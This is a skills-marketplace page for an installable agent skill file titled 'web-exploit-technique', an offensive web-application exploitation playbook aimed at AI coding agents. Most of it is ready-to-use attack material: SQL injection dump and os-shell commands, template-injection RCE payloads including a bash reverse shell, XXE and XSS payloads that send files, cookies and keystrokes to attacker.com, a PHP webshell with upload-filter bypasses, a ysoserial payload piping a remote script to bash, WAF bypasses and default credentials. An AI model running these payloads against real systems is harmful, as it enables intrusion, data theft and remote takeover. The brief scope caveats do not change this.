aeondave/web-exploit-technique
offensive-techniques/web-exploit-technique/SKILL.md
Exploitation methodology for web application vulnerabilities confirmed in vuln-search-technique. Covers injection exploitation (SQLi full chain, SSTI-to-RCE, XXE data extraction, command injection), auth attacks (JWT manipulation, OAuth bypass, cookie tossing, session hijacking), SSRF escalation (cloud metadata, internal pivoting), XSS impact (session theft, phishing, keylogging, mXSS context), file upload to RCE, deserialization chain execution, WAF bypass strategies, request smuggling, and parser/protocol confusion chains. Use when you have a confirmed web vulnerability class and need to exploit it to gain access, extract data, or escalate impact. Integrates with atomic skills: command-injection, reflected-xss, dom-xss, open-redirect, lfi, upload-rce, weak-session-ids, token-bypass, csp-bypass, backend-state-diagnostics.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill web-exploit-techniqueInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 9, 2026, 4:34 AM128.4s13 files scanned
SKILL.md
- name:
- web-exploit-technique
- description:
- Exploitation methodology for web application vulnerabilities confirmed in vuln-search-technique. Covers injection exploitation (SQLi full chain, SSTI-to-RCE, XXE data extraction, command injection), auth attacks (JWT manipulation, OAuth bypass, cookie tossing, session hijacking), SSRF escalation (cloud metadata, internal pivoting), XSS impact (session theft, phishing, keylogging, mXSS context), file upload to RCE, deserialization chain execution, WAF bypass strategies, request smuggling, and parser/protocol confusion chains. Use when you have a confirmed web vulnerability class and need to exploit it to gain access, extract data, or escalate impact. Integrates with atomic skills: command-injection, reflected-xss, dom-xss, open-redirect, lfi, upload-rce, weak-session-ids, token-bypass, csp-bypass, backend-state-diagnostics.
- license:
- MIT
- compatibility:
- Web applications, REST/GraphQL APIs, cloud-hosted services. Any OS on attacker side.
- author:
- AeonDave
- version:
- 1.0
- category:
- offensive-techniques
- language:
- multi
Web-exploit technique
Goal: turn a confirmed web vulnerability into maximum impact — data extraction, authentication bypass, RCE, or persistent access — using the precise exploitation path for each vulnerability class.
When this technique applies
vuln-search-techniqueproduced confirmed web vulnerability findings.- Vulnerability class is known (SQLi, SSRF, XSS, SSTI, file upload, etc.).
- Need to prove exploitability and assess actual business impact.
- Engagement scope includes web application exploitation.
Boundary
- Input: confirmed vulnerability + surface + class from
vuln-search-technique. - Infrastructure exploitation (CVE-based, service-level): use
vuln-exploit-technique. - Post-exploitation lateral movement: separate engagement after initial access established.
- Deep custom exploit development:
offensive-coding/skills for BOF, shellcode, ROP.
Tool families
| Need | Skill / Atomic Skill |
|---|---|
| Intercept, replay, mutate requests | offensive-tools/vuln-scanners/burpsuite/ |
| SQL injection exploitation | offensive-tools/vuln-scanners/sqlmap/ |
| Command injection (scripted) | offensive-tools/web/commix/ or web-command-injection atomic |
| Reflected/DOM/Client-side XSS | offensive-tools/vuln-scanners/dalfox/, offensive-tools/web/xsstrike/ or web-reflected-xss, web-dom-xss atomics |
| Open redirect verification | web-open-redirect atomic |
| Local file inclusion (LFI) | offensive-tools/web/liffy/ or web-local-file-inclusion atomic |
| File upload to RCE | web-unrestricted-upload-rce atomic |
| Session/token analysis | web-weak-session-ids, web-client-side-token-bypass atomics |
| CSP bypass | web-csp-script-allowlist-bypass atomic |
| Backend state and app state diagnostics | web-backend-state-diagnostics atomic |
| SSRF/SSTI/JWT | offensive-tools/vuln-scanners/ssrfmap/, offensive-tools/vuln-scanners/sstimap/, offensive-tools/web/jwt-tool/ |
| Proxy/MITM and parser testing support | offensive-tools/network/mitmproxy/, offensive-tools/web/smuggler/, offensive-tools/web/corsy/ |
Initial triage
Before exploiting, classify the confirmed web issue by class, trust boundary, and likely impact path.
- Starting state: what confirmed class do you have (SQLi, SSRF, XSS, SSTI, auth flaw, upload, deserialization, parser confusion), and on what exact surface?
- First questions: what conditions gate impact (auth, WAF, output encoding, internal reachability, parser differences), and what is the minimum proof needed to demonstrate business impact?
- Immediate actions: replay the confirmed request, verify prerequisites, choose the primary exploitation chain for that class, and define positive and negative controls before escalation.
- Tool-family direction: use interception and replay first (
burpsuite,mitmproxy), then class-specific exploitation skills (sqlmap,commix,dalfox,xsstrike,ssrfmap,sstimap,liffy,jwt-tool,smuggler,corsy) according to the confirmed surface. - Escalation rule: progress from least invasive impact proof to deeper exploitation; do not dump or modify more than needed to prove the finding.
Atomic exploitation skills
For parameterized, reusable workflows that isolate single vulnerability classes with minimal configuration, use these atomic skills:
| Vulnerability Class | Atomic Skill | When to use | |---|---|---| | Command injection (OS level) | web-command-injection | Direct-response OS command injection via GET/POST, authenticated or open | | Reflected XSS | web-reflected-xss | User input echoed into HTML without encoding | | DOM XSS | web-dom-xss | Client-side code reads location/query/fragment and writes to DOM sinks | | Open redirect | web-open-redirect | Attacker-controlled URL copied into Location header | | Local file inclusion (LFI/path traversal) | web-local-file-inclusion | User-controlled file path server-side included | | Unrestricted upload → RCE | web-unrestricted-upload-rce | Upload endpoint trusts filename/MIME, uploaded file reachable and executable | | Weak session IDs | web-weak-session-ids | App issues custom session cookies; entropy or incremental patterns suspected | | Client-side token bypass | web-client-side-token-bypass | Page source computes trust token in JavaScript (ROT13, MD5, SHA1, reversal, etc.) | | CSP allowlist bypass | web-csp-script-allowlist-bypass | CSP permits third-party hosts; attacker-controlled URL injected into script src | | Backend state diagnostics | web-backend-state-diagnostics | App state broken (missing tables, failed reset); need reusable state checks before exploitation |
Each atomic skill accepts --base-url, field names, auth parameters, and match regexes to enable reusable exploitation workflows across different hosts, endpoints, and application configurations.
Agent operating model
Per confirmed web vulnerability:
1. Identify class and surface (from vuln-search findings).
2. Select exploitation path for that class.
3. Verify environment conditions (WAF? Auth required? Encoding needed?).
4. Execute exploitation — minimally invasive first, escalate if needed.
5. Confirm impact: data extracted, access achieved, proof documented.
6. Assess escalation: can this chain to RCE, auth bypass, or lateral movement?
If WAF blocks: apply bypass techniques before abandoning.
If exploit fails: re-read vuln-search evidence, confirm surface is correct.
If behavior depends on parser/proxy boundaries: test protocol/parser confusion paths before concluding false positive.
Injection exploitation
SQL injection — full chain
From detection to data extraction to RCE:
# sqlmap — full exploit with confirmed injection point
sqlmap -u "https://target.com/page?id=1" --batch --dbs # enumerate databases
sqlmap -u "https://target.com/page?id=1" --batch -D db --tables # enumerate tables
sqlmap -u "https://target.com/page?id=1" --batch -D db -T users --dump # dump data
# POST body injection
sqlmap -u "https://target.com/login" \
--data="username=admin&password=test&submit=Login" \
--batch --dbs
# Injection in header
sqlmap -u "https://target.com/" \
--headers="X-Forwarded-For: 127.0.0.1*" \
--batch --level=3 --risk=2 --dbs
# JSON body injection
sqlmap -u "https://target.com/api/search" \
--data='{"query":"test*"}' \
--batch --level=3 --dbs
# OS command execution (MySQL/MSSQL with DBA privileges)
sqlmap -u "https://target.com/page?id=1" --os-shell --batch
# File write to webroot (MySQL + FILE privilege + known webroot)
sqlmap -u "https://target.com/page?id=1" \
--file-write=/tmp/shell.php \
--file-dest=/var/www/html/shell.php \
--batch
Manual exploitation chains — see references/injection-attacks.md.
Command injection — commix
# Auto-detect and exploit via GET parameter
commix --url "https://target.com/ping?host=127.0.0.1" --batch
# POST data
commix --url "https://target.com/exec" \
--data="ip=127.0.0.1&submit=run" --batch
# Cookie-based
commix --url "https://target.com/" \
--cookie="user=admin; cmd=ls*" --batch
# With authentication
commix --url "https://target.com/admin/exec" \
--headers="Authorization: Bearer <token>" \
--data="host=localhost" --batch
# Output filter (when only partial output visible)
commix --url "https://target.com/ping?host=127.0.0.1" \
--technique=T --batch # time-based
SSTI — server-side template injection to RCE
Once engine confirmed, apply RCE payloads per engine:
# Jinja2 (Python/Flask) — RCE
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
# Jinja2 — reverse shell
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(
'bash -c "bash -i >& /dev/tcp/<lhost>/<lport> 0>&1"').read() }}
# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
# Freemarker (Java)
<#assign ex = "freemarker.template.utility.Execute"?new()>${ex("id")}
# Velocity (Java)
#set($e = "")#foreach($i in [1])$e.class.forName("java.lang.Runtime").getMethod("exec","".class).invoke($e.class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")#end
# Smarty (PHP)
{php}echo shell_exec('id');{/php}
Tool: sstimap -u "https://target.com/profile?name=*" --os-shell
See references/injection-attacks.md for full engine matrix and bypass payloads.
SSRF — escalation paths
From confirmed SSRF to impact:
# Cloud metadata extraction (AWS IMDS v1)
url=http://169.254.169.254/latest/meta-data/
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# GCP metadata (requires header in direct access — not needed via SSRF)
url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure IMDS
url=http://169.254.169.254/metadata/instance?api-version=2021-02-01
# Internal service enumeration via SSRF
# Port scan: observe timing or response size difference
url=http://127.0.0.1:22 # SSH
url=http://127.0.0.1:6379 # Redis
url=http://127.0.0.1:8080 # Internal app
url=http://127.0.0.1:9200 # Elasticsearch (unauthenticated)
url=http://127.0.0.1:11211 # Memcached
# SSRF to internal admin panel
url=http://127.0.0.1/admin
url=http://10.0.0.1/admin
# SSRF to RCE via Redis RESP injection (if Redis accessible)
# Use Gopher:
url=gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A...
# SSRF bypass techniques
url=http://2130706433/ # 127.0.0.1 decimal
url=http://[::1]/ # IPv6 localhost
url=http://[email protected]/ # authority confusion
url=http://attacker.com#@127.0.0.1/ # fragment confusion
See references/ssrf-and-xxe.md for full bypass and escalation chains.
XXE — data extraction and SSRF
<!-- Classic file read -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
<!-- Windows path -->
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<!-- Blind XXE — out-of-band exfiltration -->
<!-- evil.dtd served from attacker server: -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
<!-- Reference evil.dtd in payload: -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
]>
<foo/>
<!-- SSRF via XXE -->
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
<!-- PHP wrapper (when file contains special chars) -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
Authentication exploitation
JWT attacks
# alg:none attack
# 1. Decode JWT: echo "<header>.<payload>" | base64 -d
# 2. Modify payload: change role, user_id, exp
# 3. Reconstruct: base64url(header_alg_none).base64url(new_payload). (empty sig)
# RS256 → HS256 confusion
# When public key is known/accessible:
# Sign with HMAC-SHA256 using public key bytes as secret key
# Weak secret brute-force
hashcat -a 0 -m 16500 "eyJ..." /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256 jwt.txt
# kid parameter SQL injection
# kid header: {"kid": "' UNION SELECT 'secret'-- "}
# HMAC key becomes the SQL result
# jku / x5u header injection
# Point to attacker-controlled JWKS endpoint:
# {"jku": "https://attacker.com/jwks.json", ...}
# jwt_tool — automated attacks
jwt_tool -t https://target.com/api/profile -rh "Authorization: Bearer <token>" -M at
See references/auth-and-session.md for full JWT and OAuth attack chains.
API authorization and real-time exploitation
For confirmed API authorization flaws, prove impact with role-tagged controls before escalating:
- BOLA/IDOR: replay user/tenant A credentials against user/tenant B object identifiers across read, write, delete, bulk, and async job endpoints.
- Mass assignment: inject unauthorized properties such as role, owner, tenant, billing, approval, or status fields; confirm persisted impact, not just a successful response.
- CORS: prove browser-readable cross-origin access on sensitive authenticated data; header reflection alone is not enough.
- WebSocket: validate authorization both at handshake and per message/channel/subscription.
Use references/api-authorization-and-realtime.md for object-ID edge cases, CORS origin bypasses, and WebSocket message-level proof requirements.
Advanced web chains
Use references/advanced-web-chains.md when the confirmed weakness involves prototype pollution, race conditions, undocumented GraphQL, exploitable CORS, or SOAP/XML services. These chains require proof of impact with controls; detection hints alone are not enough.
OAuth / SSO attacks
Attacks to test in order:
1. Missing state parameter → CSRF on auth flow
2. redirect_uri not validated → code/token theft
- Try: redirect_uri=https://attacker.com
- Try: redirect_uri=https://legitimate.com.attacker.com
- Try: redirect_uri=https://legitimate.com/../../attacker.com
3. Authorization code reuse (should be one-time)
4. Token leakage in Referer header
5. Implicit flow → token in URL fragment → leaked in logs
6. scope escalation: add admin scopes to auth request
7. PKCE absent → code interception
Session and credential attacks
# Cookie attribute analysis
# Secure cookie attribute: cookie sent over HTTP?
# HttpOnly: accessible via JS?
# SameSite: CSRF possible?
# Session fixation test
# Set known session ID before auth → if same ID after auth → fixation
# Credential stuffing (authorized scope only)
# Use hydra or custom script with known credential pairs
# Default credentials — common targets
# Jenkins: admin/admin or admin/(blank)
# Grafana: admin/admin
# Kibana: elastic/changeme
# Tomcat manager: tomcat/tomcat, admin/admin
# GitLab: root/5iveL!fe (older versions)
# Metabase: (setup wizard, no default)
XSS impact escalation
Detection of XSS is covered in vuln-search-technique. Exploitation maximizes impact:
// Session hijack
fetch('https://attacker.com/steal?c='+document.cookie)
new Image().src='https://attacker.com/steal?c='+encodeURIComponent(document.cookie)
// Credential phishing (when SOP allows reading)
// Redirect to fake login:
window.location='https://attacker.com/phish'
// Keylogger
document.addEventListener('keydown', e => {
fetch('https://attacker.com/key?k='+e.key)
})
// Full page content exfil
fetch('https://attacker.com/page', {method:'POST', body:document.documentElement.outerHTML})
// DOM-based XSS via fragment
// URL: https://target.com/page#<img src=x onerror=fetch('//attacker.com/?c='+document.cookie)>
// CSP bypass via JSONP endpoint
<script src="https://trusted.com/api/jsonp?callback=alert(1)//"></script>
// Cookie theft with httpOnly bypass (if XSS has script execution → read DOM state)
// httpOnly cookies not readable via JS — escalate to session riding instead
// XSS to CSRF — execute state-changing requests in victim context
fetch('/api/admin/add-user', {method:'POST', body: JSON.stringify({user:'attacker',role:'admin'}),
headers:{'Content-Type':'application/json', 'X-Requested-With':'XMLHttpRequest'},
credentials:'include'})
Tool: xsstrike for payload generation and blind XSS callback setup.
See references/xss-and-client.md for CSP bypass, DOM clobbering, mutation XSS.
File upload to RCE
# PHP webshell — basic
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Access: https://target.com/uploads/shell.php?cmd=id
# Extension bypass attempts (in order)
shell.php → shell.php5 → shell.phtml → shell.pHp → shell.php.jpg
shell.php%00.jpg # null byte (older PHP)
shell.php;.jpg # semicolon (some configs)
# MIME type bypass
# Upload PHP file with Content-Type: image/jpeg
# Magic byte bypass
# Prepend valid JPEG magic bytes to PHP:
printf '\xff\xd8\xff' > shell_jpg.php
cat shell.php >> shell_jpg.php
# Double extension
shell.jpg.php # if server processes last extension
shell.php.jpg # if server processes all before last
# .htaccess upload (Apache)
# Upload .htaccess:
echo "AddType application/x-httpd-php .jpg" > .htaccess
# Then upload shell.jpg with PHP code → executed as PHP
# SVG stored XSS
<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(document.cookie)</script>
</svg>
See references/file-upload-and-rce.md.
Deserialization exploitation
# Java — ysoserial gadget chains
# Enumerate available gadget chains:
java -jar ysoserial.jar
# Generate payload
java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/shell.sh | bash' > payload.ser
# Base64-encode for HTTP transport
base64 -w0 payload.ser > payload.b64
# .NET — ysoserial.net
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "whoami > /tmp/output"
# PHP — phpggc
phpggc Monolog/RCE1 system id # identify payload
# Deliver in:
# Java: serialized object in cookie, HTTP body, XML field
# .NET: ViewState, JSON API body, binary endpoint
# PHP: serialized cookie, POST body
See references/deserialization.md.
WAF bypass — general strategies
When payloads are blocked, apply before abandoning:
# Case variation
<ScRiPt>alert(1)</ScRiPt>
sElEcT * fRoM users
# URL encoding
%3Cscript%3Ealert(1)%3C%2Fscript%3E
%27%20OR%201%3D1--
# Double encoding
%253Cscript%253E (% → %25 → second decode gives %3C → <)
# Unicode / UTF-8 variations
<script> (fullwidth chars)
' → %ef%bc%87 (fullwidth apostrophe)
# Comment injection (SQL)
SE/**/LECT * FR/**/OM users
' OR/**/1=1--
# Whitespace alternatives
SELECT%09FROM%09users (tab)
SELECT%0AFROM%0Ausers (newline)
# Parameter pollution
?id=1&id=2 OR 1=1-- (some WAFs check first occurrence only)
# Chunked Transfer Encoding (bypasses body inspection on some WAFs)
# HTTP method variation
POST → PUT, PATCH (WAF may not inspect all methods)
# Payload in unusual locations
Header injection, JSON body instead of URL, alternate content-type
See references/waf-bypass.md for class-specific bypass techniques.
Protocol and parser confusion exploitation
When edge and backend parse URLs/headers differently, minor input differences can bypass controls.
Typical high-impact paths:
- Host header poisoning and cache poisoning
- Request smuggling (front-end/back-end desync)
- URL parser confusion (authority, encoded delimiters, IPv6 zone IDs)
- Rewrite/proxy semantic confusion in Apache deployments
Use references/protocol-and-parser-confusions.md for exploitation checks and escalation chains.
Quality gates
- Confirmed exploitation evidence: exact request/response demonstrating impact.
- Minimum necessary access — do not escalate beyond what confirms the finding.
- Every exploitation attempt logged with timestamp, payload, target endpoint.
- WAF bypass attempts limited to what's needed for confirmation.
Anti-patterns
- Exploiting without confirmed detection (running blind payloads hoping for output).
- Mass exploitation of multiple endpoints simultaneously — attributes nothing.
- SQL injection dump of entire database when sample rows confirm impact.
- Persistent modification of target state (adding accounts, deleting data) unless explicitly in scope.
- Ignoring WAF — bypasses often exist and should be tried before declaring not exploitable.
Resources
- references/injection-attacks.md — SQLi full chains, SSTI engine matrix and RCE payloads, command injection patterns.
- references/ssrf-and-xxe.md — SSRF escalation paths, cloud metadata extraction, XXE data exfil, bypass techniques.
- references/auth-and-session.md — JWT attack matrix, OAuth bypass flows, session fixation, credential attacks.
- references/api-authorization-and-realtime.md — BOLA/IDOR exploitation, mass assignment, CORS impact proof, and WebSocket authorization testing.
- references/xss-and-client.md — XSS impact escalation, CSP bypass, DOM attacks, blind XSS callbacks.
- references/file-upload-and-rce.md — file upload bypass techniques, webshell payloads, SSTI/deserialization-to-RCE.
- references/deserialization.md — Java/.NET/PHP deserialization exploitation workflow and gadget-selection matrix.
- references/waf-bypass.md — encoding, comment injection, parameter pollution, chunked encoding bypass strategies.
- references/protocol-and-parser-confusions.md — host header abuse, request smuggling, URL parser and rewrite/proxy confusion chains.
- references/advanced-web-chains.md — prototype pollution, race conditions, GraphQL without docs, CORS impact proof, SOAP/XML service exploitation.
- references/graphql-testing.md — GraphQL endpoint discovery, introspection, schema mapping, authorization testing, and GraphQL-specific attacks (depth, complexity, aliases, batching, CSRF, subscription abuse).
- references/lfi-and-path-traversal.md — Path traversal basics, bypass techniques, LFI escalation to RCE, PHP wrappers, and chaining workflows.
Related Skills
aeondave/offensive-linux-role
data-ai
VerifiedTrustedCommunity
Scoped routing: Linux operator; hosts, sessions, users, services, packages, logs, containers, SSH, network paths, privilege evidence.
4SKILL.mdUpdated Jun 5, 2026
aeondave/ics-technique
development
VerifiedTrustedCommunity
Offensive methodology for ICS/OT/SCADA environments in authorized industrial penetration testing and red team operations. Use when assessing PLCs, RTUs, HMIs, engineering workstations, historians, or field devices running Modbus, DNP3, EtherNet/IP, S7comm/S7+, Profinet, IEC 60870-5-104, BACnet, or OPC-UA. Covers passive OT network enumeration, protocol-level device interrogation, PLC coil/register read-write attacks, HMI session exploitation, historian and engineering workstation compromise, and safe escalation rules for critical infrastructure scope. Does not cover: general IT network exploitation (network-technique), physical hardware interfaces UART/JTAG/SPI (hardware-technique), wireless sensor network attacks (wireless-technique), RF/SDR signal analysis (hardware-ctf or wireless-technique), or CTF-framed ICS lab tasks (ics-ctf).
4SKILL.mdUpdated Jun 2, 2026
aeondave/game-technique
tools
VerifiedTrustedCommunity
Offensive methodology for authorized game security assessments, game client security research, and game-adjacent penetration testing in real-world engagements. Use when assessing game clients for cheating vulnerabilities, testing anti-cheat effectiveness, auditing game server protocols for score manipulation or economic fraud, reverse engineering game DRM or license validation, analyzing game save file protection, or assessing game mod/plugin security. Covers: process memory scanning and manipulation (Cheat Engine methodology), game binary reversing for license and DRM bypass, game network protocol analysis and packet replay, anti-cheat mechanism analysis, save file format reversing and tampering, speed hack and value injection techniques. Does NOT cover: CTF game challenges (game-ctf), game engine source code auditing (web-exploit-technique or vuln-search-technique for the backend), or general binary exploitation (pwn-ctf or reversing-technique).
4SKILL.mdUpdated Jun 2, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 2, 2026